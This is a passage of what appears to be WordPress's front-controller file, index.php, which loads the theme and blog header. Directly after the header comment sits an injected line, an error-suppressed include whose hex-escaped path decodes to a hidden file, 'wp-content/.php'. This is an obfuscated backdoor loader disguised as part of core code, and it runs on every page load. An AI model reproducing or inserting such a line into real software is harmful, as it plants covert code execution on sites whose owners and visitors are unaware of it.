g-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/@include("\x77\x70\x2d\x63\x6f\x6e\x74\x65\x6e\x74\x2f\x2e\x70\x68\x70");
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';